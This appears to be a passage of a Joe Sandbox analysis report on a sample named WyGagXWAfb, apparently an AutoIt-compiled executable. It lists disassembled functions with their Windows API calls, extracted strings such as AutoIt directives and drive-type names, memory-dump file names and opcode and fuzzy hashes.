Opcode ID: 9f04e489ea1bc7ec346743020bb047c51a8d7b6de180cc5d120721c0deb89089
Instruction ID: 97c26267b0fb3d0ea90eb91d9c9023800a152a870b011e87ed7fb2100338e0dd
Opcode Fuzzy Hash: 9f04e489ea1bc7ec346743020bb047c51a8d7b6de180cc5d120721c0deb89089
Instruction Fuzzy Hash: A7C048F180110ADBDB05DFA0DA88EFEB7BCAB08315F2044A6A502F2110EB749B488A71

Function 00B3A364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 00B3A36A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: cdd0b95200589f363b4010eb3137688c0a89c64ceee7462d1e44fe3926eca50f
Instruction ID: 217244a6c0e3e397610b70ef4619a2a0c962430e5cd16ef50c562f9fdd68dec0
Opcode Fuzzy Hash: cdd0b95200589f363b4010eb3137688c0a89c64ceee7462d1e44fe3926eca50f
Instruction Fuzzy Hash: A2A0123000410DE78A001B51EC044547F5CD6001A07004021F40C810228B3254504584

Function 00B28A0E Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f948b82594c9238b1502196912df2e7d75e7c828f511f7364bbe9f6edf57e97
Instruction ID: 0a65dedc97d0ff2cb2f0844d830816d4ab80048f39666720a17df7fa0c53e858
Opcode Fuzzy Hash: 5f948b82594c9238b1502196912df2e7d75e7c828f511f7364bbe9f6edf57e97
Instruction Fuzzy Hash: 94222930607626CBDF388F28E4D467D77E1EB05304F6845EAD85A8B691DF389D91CB60

Function 00B32405 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction ID: 89d963e71a845eb2d201b8ff38e3511d19e7fddc0f0219f44670fe38e2d32eac
Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
Instruction Fuzzy Hash: C3C1923220519309DF2D473D947503EBAE59EA27B1B2A0BDDE8B3CB5D4EF20D924D620

Function 00B3283A Relevance: .3, Instructions: 341COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction ID: 59dc041d22fdc8e1f9f9b9e0850a32ce6e46f5fb0545f5f782c4136d82f8fb45
Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
Instruction Fuzzy Hash: 62C194322051930ADF2D473E947413EFBE19A927B1B2A1BEDE4B2DB5D4EF20D524D620

Function 00B31BB8 Relevance: .3, Instructions: 323COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 5d8167f4f57fb5f84bd9663e155c0ddd89b00043b2ba6e766109b488426c4d99
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 3CC1863220519309DF2D463D947413EBAE9DAA27B1B2A1FEDE4B3CB5D4EF20D524D620

Function 00B87B1B Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00B87B70
DeleteObject.GDI32(00000000), ref: 00B87B82
DestroyWindow.USER32 ref: 00B87B90
GetDesktopWindow.USER32 ref: 00B87BAA
GetWindowRect.USER32(00000000), ref: 00B87BB1
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00B87CF2
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00B87D02
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87D4A
GetClientRect.USER32(00000000,?), ref: 00B87D56
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00B87D90
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87DB2
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87DC5
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87DD0
GlobalLock.KERNEL32(00000000), ref: 00B87DD9
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87DE8
GlobalUnlock.KERNEL32(00000000), ref: 00B87DF1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87DF8
GlobalFree.KERNEL32(00000000), ref: 00B87E03
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87E15
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00BA2CAC,00000000), ref: 00B87E2B
GlobalFree.KERNEL32(00000000), ref: 00B87E3B
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00B87E61
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00B87E80
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B87EA2
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00B8808F

Strings

, xrefs: 00B88015
AutoIt v3, xrefs: 00B87D42
static, xrefs: 00B87D8A, 00B87EE1
DISPLAY, xrefs: 00B87EF2

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: fac8fe03d3c39f0eba948c47c461b4d977e3ee4900a1e1f3380777e9c08a6d86
Instruction ID: b777a23dca197061f6ad2c531bc143b1378452b2652902aed73a9eaeee56fcca
Opcode Fuzzy Hash: fac8fe03d3c39f0eba948c47c461b4d977e3ee4900a1e1f3380777e9c08a6d86
Instruction Fuzzy Hash: 85026B71900215AFDB14DFA4CD99EAEBBF9EB48314F148199F905EB2A1DB30ED40CB60

Function 00B937F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00B9F910), ref: 00B938AF
IsWindowVisible.USER32(?), ref: 00B938D3

Strings

CHECK, xrefs: 00B93AF5
GETCURRENTLINE, xrefs: 00B93B75
GETLINECOUNT, xrefs: 00B93B4E
ISVISIBLE, xrefs: 00B938BF
GETSELECTED, xrefs: 00B93B2B
GETLINE, xrefs: 00B93C23
FINDSTRING, xrefs: 00B939FE
CURRENTTAB, xrefs: 00B93945
EDITPASTE, xrefs: 00B93BE7
ADDSTRING, xrefs: 00B9399E
DELSTRING, xrefs: 00B939D1
SETCURRENTSELECTION, xrefs: 00B93A3E
GETCURRENTSELECTION, xrefs: 00B93A6B
ISCHECKED, xrefs: 00B93AC1
UNCHECK, xrefs: 00B93B0B
SHOWDROPDOWN, xrefs: 00B93968
ISENABLED, xrefs: 00B938F3
SELECTSTRING, xrefs: 00B93A8E
GETCURRENTCOL, xrefs: 00B93BB0
SENDCOMMANDID, xrefs: 00B93C62
TABLEFT, xrefs: 00B9390F
TABRIGHT, xrefs: 00B93925
HIDEDROPDOWN, xrefs: 00B93988

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 32874011f2a8b3cf8a0bdc4e74a5d6798f9c0d0f90ea8beccf40737a3f41a19b
Instruction ID: d98b7adde8f35a7787050c523111b34fb8e8d439ac7a7e80a5fce558515031ed
Opcode Fuzzy Hash: 32874011f2a8b3cf8a0bdc4e74a5d6798f9c0d0f90ea8beccf40737a3f41a19b
Instruction Fuzzy Hash: 2AD11C302147059BCF14EF10C4A5EAEB7E9EF94754F5444ECB8865B2A2CB35EE4ACB81

Function 00B9A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 00B9A89F
GetSysColorBrush.USER32(0000000F), ref: 00B9A8D0
GetSysColor.USER32(0000000F), ref: 00B9A8DC
SetBkColor.GDI32(?,000000FF), ref: 00B9A8F6
SelectObject.GDI32(?,?), ref: 00B9A905
InflateRect.USER32(?,000000FF,000000FF), ref: 00B9A930
GetSysColor.USER32(00000010), ref: 00B9A938
CreateSolidBrush.GDI32(00000000), ref: 00B9A93F
FrameRect.USER32(?,?,00000000), ref: 00B9A94E
DeleteObject.GDI32(00000000), ref: 00B9A955
InflateRect.USER32(?,000000FE,000000FE), ref: 00B9A9A0
FillRect.USER32(?,?,?), ref: 00B9A9D2
GetWindowLongW.USER32(?,000000F0), ref: 00B9A9FD

Part of subcall function 00B9AB60: GetSysColor.USER32(00000012), ref: 00B9AB99
Part of subcall function 00B9AB60: SetTextColor.GDI32(?,?), ref: 00B9AB9D
Part of subcall function 00B9AB60: GetSysColorBrush.USER32(0000000F), ref: 00B9ABB3
Part of subcall function 00B9AB60: GetSysColor.USER32(0000000F), ref: 00B9ABBE
Part of subcall function 00B9AB60: GetSysColor.USER32(00000011), ref: 00B9ABDB
Part of subcall function 00B9AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B9ABE9
Part of subcall function 00B9AB60: SelectObject.GDI32(?,00000000), ref: 00B9ABFA
Part of subcall function 00B9AB60: SetBkColor.GDI32(?,00000000), ref: 00B9AC03
Part of subcall function 00B9AB60: SelectObject.GDI32(?,?), ref: 00B9AC10
Part of subcall function 00B9AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 00B9AC2F
Part of subcall function 00B9AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B9AC46
Part of subcall function 00B9AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 00B9AC5B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: b05c43a8d2502463245531b429aeaa3e38c43ed7286521775bc48bfa80eda8b2
Instruction ID: 4c89970ebb523fd71046ea74e41a2e230aa624657bad2ff1bf4b872c6c6d1b81
Opcode Fuzzy Hash: b05c43a8d2502463245531b429aeaa3e38c43ed7286521775bc48bfa80eda8b2
Instruction Fuzzy Hash: 75A16071408302AFDB109F64DD48A6B7BE9FB88331F114A2AF962D71A1DB71D944CB92

Function 00B12C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00B12CA2
DeleteObject.GDI32(00000000), ref: 00B12CE8
DeleteObject.GDI32(00000000), ref: 00B12CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00B12CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00B12D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 00B4C68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00B4C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00B4CAED

Part of subcall function 00B11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B12036,?,00000000,?,?,?,?,00B116CB,00000000,?), ref: 00B11B9A

SendMessageW.USER32(?,00001053), ref: 00B4CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00B4CB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B4CB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00B4CB62

Strings

0, xrefs: 00B4C981

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: b2bcd7b3c4cfc74a60338145d6b0a50512e8ccf01974c44673cad4cc23e33f1f
Instruction ID: 39823be643371458668f29f624577825e35a2e1dafe24d35c85d2a8f8448464f
Opcode Fuzzy Hash: b2bcd7b3c4cfc74a60338145d6b0a50512e8ccf01974c44673cad4cc23e33f1f
Instruction Fuzzy Hash: D112AD30601202EFDB61CF24C984BA9BBE5FF44710F5445B9E985DB262CB31ED91EB91

Function 00B877BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 00B877F1
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00B878B0
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00B878EE
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00B87900
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00B87946
GetClientRect.USER32(00000000,?), ref: 00B87952
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00B87996
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00B879A5
GetStockObject.GDI32(00000011), ref: 00B879B5
SelectObject.GDI32(00000000,00000000), ref: 00B879B9
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00B879C9
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B879D2
DeleteDC.GDI32(00000000), ref: 00B879DB
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00B87A07
SendMessageW.USER32(00000030,00000000,00000001), ref: 00B87A1E
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00B87A59
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00B87A6D
SendMessageW.USER32(00000404,00000001,00000000), ref: 00B87A7E
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00B87AAE
GetStockObject.GDI32(00000011), ref: 00B87AB9
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00B87AC4
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00B87ACE

Strings

msctls_progress32, xrefs: 00B87A4F
static, xrefs: 00B87990, 00B87AA8
AutoIt v3, xrefs: 00B8793E
DISPLAY, xrefs: 00B8799B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 1d41e00ccbf20c973b2a618c94f5040417eee183c40afe2b182a642e97bf2376
Instruction ID: fb7a458f06ee5b56e373ccdcac622d27c8036c4ad049186bac88bc33fad4a9c6
Opcode Fuzzy Hash: 1d41e00ccbf20c973b2a618c94f5040417eee183c40afe2b182a642e97bf2376
Instruction Fuzzy Hash: CCA17F71A40219BFEB14DBA4DD4AFAEBBB9EB44714F104156FA15E72E0DB70AD00CB60

Function 00B7AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B7AF89
GetDriveTypeW.KERNEL32(?,00B9FAC0,?,\\.\,00B9F910), ref: 00B7B066
SetErrorMode.KERNEL32(00000000,00B9FAC0,?,\\.\,00B9F910), ref: 00B7B1C4

Strings

RAMDisk, xrefs: 00B7B090
iSCSI, xrefs: 00B7B169
SSD, xrefs: 00B7B0F1
Fibre, xrefs: 00B7B154
Fixed, xrefs: 00B7B0AE
RAID, xrefs: 00B7B162
ATAPI, xrefs: 00B7B138
Removable, xrefs: 00B7B0B8
MMC, xrefs: 00B7B185
\\.\, xrefs: 00B7AFDB
Network, xrefs: 00B7B0A4
SATA, xrefs: 00B7B177
CDROM, xrefs: 00B7B09A
USB, xrefs: 00B7B15B
1394, xrefs: 00B7B146
SCSI, xrefs: 00B7B131
Virtual, xrefs: 00B7B18C
FileBackedVirtual, xrefs: 00B7B193
PhysicalDrive, xrefs: 00B7B012
Unknown, xrefs: 00B7B086, 00B7B12A
SAS, xrefs: 00B7B170
SSA, xrefs: 00B7B14D
ATA, xrefs: 00B7B13F

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 5bc637248ab0d47dcfa562726e491d67bf11d6d6b69ecf226b8d253123654417
Instruction ID: 63a86afe128fa998abc466d47a3691cc9b40341cc353b5d8ea5a0119b49bb3a6
Opcode Fuzzy Hash: 5bc637248ab0d47dcfa562726e491d67bf11d6d6b69ecf226b8d253123654417
Instruction Fuzzy Hash: 48519170694389AB8B00DB10C9A6FBD73F1FB547457A0C0DAE42EB7AA0CB659D41DF42

Function 00B16A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00B16A91
__wcsnicmp.LIBCMT ref: 00B16AA9
__wcsnicmp.LIBCMT ref: 00B16AC1
__wcsnicmp.LIBCMT ref: 00B16AD9
__wcsnicmp.LIBCMT ref: 00B16AF1
__wcsnicmp.LIBCMT ref: 00B16B09
__wcsnicmp.LIBCMT ref: 00B16B21
__wcsnicmp.LIBCMT ref: 00B16B35
__wcsnicmp.LIBCMT ref: 00B16B76
__wcsnicmp.LIBCMT ref: 00B16B8A
__wcsnicmp.LIBCMT ref: 00B16B9E
__wcsnicmp.LIBCMT ref: 00B16BB2

Strings

#notrayicon, xrefs: 00B16AA3
#ce, xrefs: 00B16BAC
#comments-end, xrefs: 00B16B98
#OnAutoItStartRegister, xrefs: 00B16AD3
#requireadmin, xrefs: 00B16ABB
#cs, xrefs: 00B16B2F, 00B16B84
Unterminated group of comments, xrefs: 00B4E82C
Cannot parse #include, xrefs: 00B4E819
#comments-start, xrefs: 00B16B1B, 00B16B70
#include-once, xrefs: 00B16AEB
Bad directive syntax error, xrefs: 00B4E743
#include, xrefs: 00B16B03
#pragma compile, xrefs: 00B16A8B

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: 86faace0e5b93bec8b25522685ca95aefce35aa409282424217c1f661d78c7a6
Instruction ID: dc08728abf18a70435e0b2584ea5084db0d3a6412030893c27902efdf40caa64
Opcode Fuzzy Hash: 86faace0e5b93bec8b25522685ca95aefce35aa409282424217c1f661d78c7a6
Instruction Fuzzy Hash: 9981F270644215BACB20AB24CC83FFF77E8EF15714F5440E5F945AA192EB70DB91D2A1

Function 00B9AB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 00B9AB99
SetTextColor.GDI32(?,?), ref: 00B9AB9D
GetSysColorBrush.USER32(0000000F), ref: 00B9ABB3
GetSysColor.USER32(0000000F), ref: 00B9ABBE
CreateSolidBrush.GDI32(?), ref: 00B9ABC3
GetSysColor.USER32(00000011), ref: 00B9ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B9ABE9
SelectObject.GDI32(?,00000000), ref: 00B9ABFA
SetBkColor.GDI32(?,00000000), ref: 00B9AC03
SelectObject.GDI32(?,?), ref: 00B9AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 00B9AC2F
